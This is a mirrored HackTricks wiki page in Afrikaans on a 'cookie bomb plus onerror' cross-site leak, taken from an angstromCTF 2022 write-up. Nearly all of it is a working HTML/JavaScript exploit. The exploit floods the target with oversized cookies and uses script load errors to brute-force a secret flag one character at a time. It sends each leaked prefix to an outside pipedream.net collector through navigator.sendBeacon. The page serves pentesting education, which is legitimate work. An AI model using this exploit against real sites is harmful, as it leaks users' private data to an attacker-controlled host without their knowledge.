maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md

61 lines
2.0 KiB
Markdown
Raw Blame History

# Cookie Bomb + Onerror XS Leak
{{#include ../../banners/hacktricks-training.md}}
Die volgende **script** geneem van [**hier**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) benut 'n funksionaliteit wat die gebruiker toelaat om **enige hoeveelheid koekies** in te voeg, en dan 'n lêer as 'n script te laai met die wete dat die werklike antwoord groter sal wees as die valse een en dan. As dit suksesvol is, is die antwoord 'n omleiding met 'n resulterende URL wat langer is, **te groot om deur die bediener hanteer te word, so dit keer 'n fout http statuskode terug**. As die soektog misluk, sal niks gebeur nie omdat die URL kort is.
```html
<>'";
<form action="https://sustenance.web.actf.co/s" method="POST">
<input id="f" /><input name="search" value="a" />
</form>
<script>
const $ = document.querySelector.bind(document)
const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
let i = 0
const stuff = async (len = 3500) => {
let name = Math.random()
$("form").target = name
let w = window.open("", name)
$("#f").value = "_".repeat(len)
$("#f").name = i++
$("form").submit()
await sleep(100)
}
const isError = async (url) => {
return new Promise((r) => {
let script = document.createElement("script")
script.src = url
script.onload = () => r(false)
script.onerror = () => r(true)
document.head.appendChild(script)
})
}
const search = (query) => {
return isError(
"https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
)
}
const alphabet =
"etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
const url = "//en4u1nbmyeahu.x.pipedream.net/"
let known = "actf{"
window.onload = async () => {
navigator.sendBeacon(url + "?load")
await Promise.all([stuff(), stuff(), stuff(), stuff()])
await stuff(1600)
navigator.sendBeacon(url + "?go")
while (true) {
for (let c of alphabet) {
let query = known + c
if (await search(query)) {
navigator.sendBeacon(url, query)
known += c
break
}
}
}
}
</script>
```
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink